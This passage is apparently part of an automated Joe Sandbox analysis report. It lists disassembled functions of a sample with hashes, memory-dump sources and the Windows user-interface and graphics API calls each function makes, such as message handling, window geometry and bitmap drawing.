                                                                  • Instruction Fuzzy Hash: 9C7105B0E10219DBDF24EFA4CD84AADBBB5FF14314F2041A9E948AB251DB31AD91DF40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3Object_memmove
                                                                  • String ID: $TR/
                                                                  • API String ID: 107514201-1616536723
                                                                  • Opcode ID: ee54433efd0e1f078a74d358c5b706168b6b4b14f83eae94920723afe85fb5c0
                                                                  • Instruction ID: 7f7cf6bf3e5b454b71c7251e4e5d2060a3e4ac5e6f7c17fbe9f1c1514eb20e96
                                                                  • Opcode Fuzzy Hash: ee54433efd0e1f078a74d358c5b706168b6b4b14f83eae94920723afe85fb5c0
                                                                  • Instruction Fuzzy Hash: 43414871C2011AAFCF15DFA4DC819EEBB75FF54301B50402AE916B62A0EB305E19DFA4
                                                                  APIs
                                                                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 0020F9CA
                                                                  • DispatchMessageW.USER32(?), ref: 0020F9DC
                                                                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0020F9EC
                                                                  • GetCapture.USER32 ref: 0020F9F2
                                                                  • SetCapture.USER32(?), ref: 0020F9FF
                                                                  • GetWindowRect.USER32(?,?), ref: 0020FA23
                                                                  • GetCapture.USER32 ref: 0020FA82
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020FA9D
                                                                  • DispatchMessageW.USER32(?), ref: 0020FAC1
                                                                  • GetScrollPos.USER32(?,00000002), ref: 0020FBD8
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000581), ref: 0020FBF2
                                                                    • Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66
                                                                  • ReleaseCapture.USER32 ref: 0020FC7E
                                                                  • IsWindow.USER32(?), ref: 0020FC87
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Message$CaptureWindow$Dispatch$PeekRectRedrawReleaseScrollShow
                                                                  • String ID:
                                                                  • API String ID: 1149966214-0
                                                                  • Opcode ID: 283a7ef15e1720c5246f4ebf8597d01ed34135c9d0d1e02d210dccc7b60feb94
                                                                  • Instruction ID: 3e6f81f43578652080df7cf709086b997608bab44bbab11d3721cadc08641b28
                                                                  • Opcode Fuzzy Hash: 283a7ef15e1720c5246f4ebf8597d01ed34135c9d0d1e02d210dccc7b60feb94
                                                                  • Instruction Fuzzy Hash: 43A17171A5030A9FDB20DFA4CA989BEB7F9BF48300F14443EE54A97692DB70AC51CB50
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$CopyParentWindow
                                                                  • String ID: 2
                                                                  • API String ID: 642869531-3001879987
                                                                  • Opcode ID: 75267d6bbed8a46e140ecb35a3ef30ad81fb721ad0ac1a50deb4a4fb9fe65bec
                                                                  • Instruction ID: d710cf0f1b89b7ffb1da7e3ca07a41575530cc6475e8b28b7de6c6c92286ae65
                                                                  • Opcode Fuzzy Hash: 75267d6bbed8a46e140ecb35a3ef30ad81fb721ad0ac1a50deb4a4fb9fe65bec
                                                                  • Instruction Fuzzy Hash: 49B10271E1021A9FCF11DFA8D990AEEBBF8EF58344F14412AE845E7210E7719A90CF90
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00212CFA
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00212D33
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 00212D3A
                                                                  • CopyRect.USER32(?,?), ref: 00212D52
                                                                  • CopyRect.USER32(?,?), ref: 00212D5C
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00212D93
                                                                  • GetSystemMetrics.USER32(00000022), ref: 00212E11
                                                                  • GetSystemMetrics.USER32(00000023), ref: 00212E18
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: RectSystem$CopyInfoMetricsMonitor$Exception@8FromH_prolog3ParametersPointThrowWindow
                                                                  • String ID: "9!$"9!$(
                                                                  • API String ID: 348238172-4002098449
                                                                  • Opcode ID: 3c91acd935f1f30616cca6fbcff11fe1a0207aaa383a291388069f122834244c
                                                                  • Instruction ID: f93a477323ac821129466dc1213733ae567a4a15cface4dfa31623b81c701e6d
                                                                  • Opcode Fuzzy Hash: 3c91acd935f1f30616cca6fbcff11fe1a0207aaa383a291388069f122834244c
                                                                  • Instruction Fuzzy Hash: 3151F6B1D002099FCB14DFA9D985AEEBBF9FF98300F14456AE905E7214DB30AA55CF60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Empty$IntersectObjectSelect$Stretch
                                                                  • String ID:
                                                                  • API String ID: 401711590-0
                                                                  • Opcode ID: 31d0103111f753fd4d5092799ee12cd3c725cdbd10ab01802ce8c3920e28e378
                                                                  • Instruction ID: 75ab3fdc6e57b9f8ec6dca49aa9e24177c6c5bd384cfa26df98ffdbca32f91af
                                                                  • Opcode Fuzzy Hash: 31d0103111f753fd4d5092799ee12cd3c725cdbd10ab01802ce8c3920e28e378
                                                                  • Instruction Fuzzy Hash: BAC1D3B291010AAFCF15CFA8D9849EEBBB9BF48354F158219F815E7214DB30E955CFA0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002361C4
                                                                  • TransparentBlt.MSIMG32(00000000,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,000000FF,00000048,00236DED,00000000,?,?), ref: 0023621C
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00236261
                                                                  • CreateCompatibleDC.GDI32(?), ref: 0023627E
                                                                  • CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0023629C
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00236300
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00CC0020), ref: 0023632E
                                                                  • CreateBitmap.GDI32(00000000,00000000,00000001,00000001,00000000), ref: 0023633B
                                                                  • BitBlt.GDI32(001F80B9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CC0020), ref: 00236374
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,001F80B9,00000000,00000000,008800C6), ref: 002363A2
                                                                  • BitBlt.GDI32(?,?,00000000,00000000,00000000,001F80B9,00000000,00000000,008800C6), ref: 002363CF
                                                                  • BitBlt.GDI32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00EE0086), ref: 002363EA
                                                                    • Part of subcall function 001CDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 001CDC99
                                                                    • Part of subcall function 001D0389: DeleteDC.GDI32(00000000), ref: 001D039B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Compatible$Bitmap$DeleteH_prolog3H_prolog3_catch_StretchTransparent
                                                                  • String ID:
                                                                  • API String ID: 650092443-0
                                                                  • Opcode ID: 2238a3f09a82ced5109985eea5925bcd74e45d469156c289cfe1c6262ae7447c
                                                                  • Instruction ID: 5f8f762bb0bf7cdb2407d4e27842f9f12a1ea87bde20d7cbd35f5444bcca8b71
                                                                  • Opcode Fuzzy Hash: 2238a3f09a82ced5109985eea5925bcd74e45d469156c289cfe1c6262ae7447c
                                                                  • Instruction Fuzzy Hash: E891EE7181015ABFCF02EF90CD85EEEBB7ABF28344F244129F51566261C7319E25EB60
                                                                  APIs
                                                                    • Part of subcall function 0021C61A: LoadCursorW.USER32(00000000,00007F8B), ref: 0021C63B
                                                                    • Part of subcall function 0021C61A: LoadCursorW.USER32(?,00007901), ref: 0021C654
                                                                  • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 0021C9CA
                                                                  • PostMessageW.USER32(?,00000111,0000E145,00000000), ref: 0021CA2D
                                                                  • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 0021CA4F
                                                                  • GetCursorPos.USER32(?), ref: 0021CA6A
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0021CA96
                                                                  • ReleaseCapture.USER32 ref: 0021CAE3
                                                                  • SetCapture.USER32(?), ref: 0021CAE8
                                                                  • ReleaseCapture.USER32 ref: 0021CAF4
                                                                  • SendMessageW.USER32(?,00000362,?,00000000), ref: 0021CB08
                                                                  • SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 0021CB33
                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 0021CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Message$CaptureCursorSend$LoadPeekPostRelease
                                                                  • String ID:
                                                                  • API String ID: 291007519-0
                                                                  • Opcode ID: e663a904ffb5435f9b7937b24c319708423d9c8f3fba4c0204d701a6e712b11e
                                                                  • Instruction ID: 5f849cfa2dc190c3fd7da30d014dbd7a7b6b1aa02b903cc830232395e93cad4e
                                                                  • Opcode Fuzzy Hash: e663a904ffb5435f9b7937b24c319708423d9c8f3fba4c0204d701a6e712b11e
                                                                  • Instruction Fuzzy Hash: 57515C75690209AFDB119FA0DC89AEEBBF9FF54344F204469E286E71A0DB709D90DF10
                                                                  APIs
                                                                  • GetKeyState.USER32(00000011), ref: 001FF1DC
                                                                  • GetWindowRect.USER32(?,?), ref: 001FF244
                                                                  • GetCursorPos.USER32(?), ref: 001FF28E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CursorRectStateWindow
                                                                  • String ID: 2
                                                                  • API String ID: 3412758350-3001879987
                                                                  • Opcode ID: 7dcc2244be62c7b442f7386a601c0b95f8d966e9a03ca348251417d3deb016c3
                                                                  • Instruction ID: 11dca5e585655a015ab276e15094257e568520502cf4ff24692138085ada59ee
                                                                  • Opcode Fuzzy Hash: 7dcc2244be62c7b442f7386a601c0b95f8d966e9a03ca348251417d3deb016c3
                                                                  • Instruction Fuzzy Hash: BCB1F475A00209EFCB24EFA5D885AEEBBF5BF48304F24447EE646A7251DB709941CF21
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00221061
                                                                  • GetSystemMenu.USER32(?,00000000,00000214,001E3060,00000000,00000000,00000001,?), ref: 002210C3
                                                                  • IsMenu.USER32(?), ref: 002210DC
                                                                  • IsMenu.USER32(?), ref: 002210F6
                                                                  • SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0022112B
                                                                  • GetClassLongW.USER32(?,000000DE), ref: 00221141
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0022118C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Long$ClassH_prolog3_MessageSendSystemWindow
                                                                  • String ID: 0
                                                                  • API String ID: 859179710-4108050209
                                                                  • Opcode ID: 5a4bd4e0728a776111a92fc7228af571539e8cdc7b9f70b4001a37e4ddfce05a
                                                                  • Instruction ID: 49bb96c67fd0b1845507cdef6f14c0f1a7739b8f8c1890e0fde2256f2c7eef92
                                                                  • Opcode Fuzzy Hash: 5a4bd4e0728a776111a92fc7228af571539e8cdc7b9f70b4001a37e4ddfce05a
                                                                  • Instruction Fuzzy Hash: D1818230510666EFDB21DF64DC88FAEB7B4FF54300F2446AAE89A96191DB705A61CF40
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 00219550
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00219582
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 00219589
                                                                  • CopyRect.USER32(001FB155,?), ref: 0021959B
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,001FB155,00000000), ref: 002195AB
                                                                  • OffsetRect.USER32(?,001FB155,00000000), ref: 002195D5
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00219600
                                                                  • OffsetRect.USER32(?,00000000,00000000), ref: 0021962D
                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00219652
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Offset$InfoMonitor$CopyCursorFromParametersPointSystem
                                                                  • String ID: (
                                                                  • API String ID: 4030222242-3887548279
                                                                  • Opcode ID: 818a5d9fd1641afb1da6f9db94eb86983d5b79c9a47e2dc972b7b3ee5710d2ce
                                                                  • Instruction ID: ab8f56beacf005bde0a98e815fb0b14c008b9653f762547454129768deefb9fc
                                                                  • Opcode Fuzzy Hash: 818a5d9fd1641afb1da6f9db94eb86983d5b79c9a47e2dc972b7b3ee5710d2ce
                                                                  • Instruction Fuzzy Hash: 8141F971A10209EFDB14CFA9D9D49EEF7FAFF58300F648129E505A7240DB70AD868B60
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 001CD6E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
                                                                  • API String ID: 2538663250-1403614551
                                                                  • Opcode ID: 5982357fe674153f7acbdf4c9247e2368e881e99d546668a220b4d2b321b94da
                                                                  • Instruction ID: 174bbd28eebe1f89f6732e8832c8f24eba7078bf689ed0b8faebdaba3aaa1eca
                                                                  • Opcode Fuzzy Hash: 5982357fe674153f7acbdf4c9247e2368e881e99d546668a220b4d2b321b94da
                                                                  • Instruction Fuzzy Hash: E011E7717C4344BA87165F6ABCC5EA6BB58DBA1B18B10453EF01AE1150DBB0D990CA50
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001DFE9A
                                                                  • GetParent.USER32(?), ref: 001DFEA7
                                                                  • IsZoomed.USER32(?), ref: 001DFF0B
                                                                  • SetWindowRgn.USER32(?,00000000,00000001), ref: 001DFF6A
                                                                  • GetClientRect.USER32(?,?), ref: 001DFF92
                                                                  • GetClientRect.USER32(?,?), ref: 001DFFA7
                                                                    • Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D016D
                                                                    • Part of subcall function 001D015C: ClientToScreen.USER32(?,?), ref: 001D017A
                                                                  • GetWindowRect.USER32(?,?), ref: 001DFFC7
                                                                    • Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F
                                                                  • SetWindowRgn.USER32(?,00000000,00000001), ref: 001E0152
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientRect$Screen$ParentZoomed
                                                                  • String ID:
                                                                  • API String ID: 2314217310-0
                                                                  • Opcode ID: 980337a443d610e0200179f1fc48b1c9d977e12a41341a4b28298efac182a6ec
                                                                  • Instruction ID: 5d9a5561315f108cbfe0365b6b85cd89d6534149ff7856420e160b0ff50e997d
                                                                  • Opcode Fuzzy Hash: 980337a443d610e0200179f1fc48b1c9d977e12a41341a4b28298efac182a6ec
                                                                  • Instruction Fuzzy Hash: 0AB12D7190021A9FCF15DFA5C984AEEBBB9FF48700F15017AF905AB256DB709A41CFA0
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 002101BF
                                                                  • ScreenToClient.USER32(?,?), ref: 002101CC
                                                                  • PtInRect.USER32(?,?,?), ref: 002101FA
                                                                  • PtInRect.USER32(?,?,?), ref: 0021021F
                                                                  • KillTimer.USER32(?,00000002), ref: 0021024F
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0021026D
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0021027B
                                                                  • _clock.LIBCMT ref: 00210290
                                                                  • KillTimer.USER32(?,00000001), ref: 00210395
                                                                  • ValidateRect.USER32(?,00000000), ref: 002103B1
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 002103EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow_clock
